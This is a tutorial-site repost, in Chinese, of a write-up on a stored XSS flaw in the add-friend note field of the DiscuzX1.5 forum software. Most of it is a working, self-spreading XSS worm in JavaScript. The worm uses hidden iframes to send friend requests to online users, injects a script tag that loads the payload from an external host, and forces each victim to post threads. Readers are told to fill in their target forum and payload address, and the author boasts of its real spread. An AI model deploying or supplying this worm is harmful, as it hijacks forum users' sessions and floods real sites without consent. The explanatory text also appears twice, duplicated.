您现在的位置是:首页 > cms教程 > Discuz教程Discuz教程
DiscuzX1.5利用添加好友处存储xss进行蠕虫worm扩散
听蓉2025-07-13Discuz教程已有人查阅
导读DiscuzX1.5在添加好友的地方有处存储xss,借助此处xss跟用户交互可以进行蠕虫指数扩散,位置在添加好友处x完之后的效果,点击后触发。
DiscuzX1.5在添加好友的地方有处存储xss,借助此处xss跟用户交互可以进行蠕虫指数扩散,位置在添加好友处x完之后的效果,点击后触发。
ok借助此存储xss,我们进行worm传播,dz的会话cookie是被打伤http-only的,但是xss的效果是获取你当前域下的用户会话的权限。这不干扰我们worm的进行。
step1:attacker发送带xss worm payload给用户a
step2:用户A点击后,自身作为宿主去添加其他人为好友,并且附带攻击payload
step3:被x的用户互相感染,成指数增长,为了验证,凡是被感染的用户都会被我们用js控制发一个帖子没code说个jb,worm代码如下你需要修改
1 urlBase 为你的想1.5 论坛基地址
2 存放xss的payload的地址
ok借助此存储xss,我们进行worm传播,dz的会话cookie是被打伤http-only的,但是xss的效果是获取你当前域下的用户会话的权限。这不干扰我们worm的进行。
step1:attacker发送带xss worm payload给用户a
step2:用户A点击后,自身作为宿主去添加其他人为好友,并且附带攻击payload
step3:被x的用户互相感染,成指数增长,为了验证,凡是被感染的用户都会被我们用js控制发一个帖子没code说个jb,worm代码如下你需要修改
1 urlBase 为你的想1.5 论坛基地址
2 存放xss的payload的地址
//code for xss test
//论坛的基地址
var urlBase = "http://forum.xxx.com";
var add= function(uid){
var ifBox = window['ifBox'] || (window['ifBox']={});
var uyk = (new Date()).getTime();
var ifFame = ifBox[uyk] =document.createElement("iframe");
ifFame.src=urlBase + "/home.php?mod=spacecp&ac=friend&op=add&uid="+uid;
ifFame.width=0;ifFame.height=0;
ifFame.onload = function(){
try{
//存放xss payload的地址
ifFame.contentDocument.getElementsByName("note")[0].value= 'hello<script src="http://xxx.xxx.xxx/js/dz.js"></script>';
ifFame.contentDocument.getElementById("addsubmit_btn").click();
ifFame=null;
}catch(err){
}
}
document.body.appendChild(ifFame);
}
var newThread = function(){
var if1 = document.createElement("iframe");
if1.src= urlBase+"/forum.php?mod=post&action=newthread&fid=21";
if1.width=0;if1.height=0;
if1.onload = function(){
var doc =if1.contentDocument;
doc.getElementById("subject").value = "哇卡卡卡~~~";
if1.contentDocument.getElementById("e_iframe").contentDocument.body.innerHTML =" _______________</br>< XSS Worm Test ></br> ---------------</br> \ ^__^</br> \ (oo)\_______</br> (__)\ )\/\</br> ||----w |</br> || ||</br>";
doc.getElementById("postsubmit").click();
if1.onload = function(){return false;}
}
document.body.appendChild(if1);
}
var if0 = document.createElement("iframe");
if0.src= urlBase + "/forum.php?showoldetails=yes#online";
if0.width=0;if0.height=0;
if0.onload = function(){
var uli =if0.contentDocument.getElementsByTagName("li");
for(var i = 0;i<uli.length;i++){
if(uli.title.length > 5){
var uid = uli.childNodes[3].href.substring(uli.childNodes[3].href.indexOf("uid=")+4);
var r = Math.round(Math.random() * 10);
// if(i%10 == r){
//轻点
newThread();
add(uid);
// }
}
}
}
document.body.appendChild(if0);
这里面又很多的坑包括js的异步加载,跨iframe的元素操作等等,希望对其他人能提供帮助,实际的worm效果是,20分钟内刷了30页,每页20篇的论坛帖子把。
感谢您的认可和支持
微信
支付宝
本文标签:
很赞哦! ()
相关教程
图文教程
discuz伪静态设置方法教程
伪静态是一种将动态 URL 转换为静态 URL 的技术。在 Discuz 中设置伪静态的步骤包括:1. 安装伪静态模块;2. 根据系统类型(Nginx 或 Apache),修改服务器配置文件;
discuz优化技巧分享
Discuz论坛是国内使用最多的论坛系统,现在较新版为X3.4,X3.4从2018年1月1日起只在官方Git发布,说明已经开源了。discuz有那么多的粉丝,跟它完善的功能有很大关系
Discuz!NT的.net中伪静态方式
Discuz!NT的.net中伪静态
Discuz模板风格制作方法
Discuz!模板风格制作1、在Photoshop中制作风格页面并切图保存;2、制作html文档,css调整;在制作html文件之前,您必须熟悉Discuz ! 模板的元素和css。
相关源码
-
(自适应)帝国cms7.5文章新闻博客整站源码( 带会员中心)本模板基于帝国CMS内核开发,为新闻资讯、个人博客及作品展示类网站设计。采用响应式布局技术,确保在手机、平板和电脑等不同设备上都能获得良好的浏览体验。查看源码 -
(自适应响应式)AI智能电子科技产品pbootcms网站模板下载基于PbootCMS内核的响应式模板,为AI智能硬件、电子产品等科技企业打造,通过技术创新实现品牌数字化升级。查看源码 -
(自适应响应式)html5高档服装定制西服pbootcms模板下载本模板基于PbootCMS内核开发,为服装定制企业和服装品牌量身打造。设计风格时尚现代,充分展现服装行业的审美特质与品牌魅力。采用HTML5响应式技术,确保在各种设备上呈现视觉效果。整站布局注重产品展示与品牌叙事,帮助企业有效展示服装系列与定制服务,提升客户体验。查看源码 -
手机软件APP游戏软件下载网站Pbootcms模板(自适应)基于PbootCMS内核深度开发的网站模板,为移动互联网时代打造。无论是手机APP推广、游戏软件展示,还是各类企业官网需求,本模板都能通过简单的图文替换实现行业无缝切换查看源码 -
(PC+WAP)智能机器人人工智能物联网自动化设备源码下载本模板基于PbootCMS内核开发,为智能机器人及传感器科技企业精心设计。采用现代化设计风格,突出科技感与专业性,多方位展示企业技术实力与产品优势。查看源码 -
(PC+WAP)绿色硅胶橡胶玩具制品营销型网站源码下载为硅胶橡胶制品及玩具行业打造的营销型网站模板,采用PbootCMS内核开发,通过模块化设计实现产品参数、安全认证、应用场景等专业内容的可视化呈现,助力企业建立可信赖的线上展示平台。查看源码
| 分享笔记 (共有 篇笔记) |
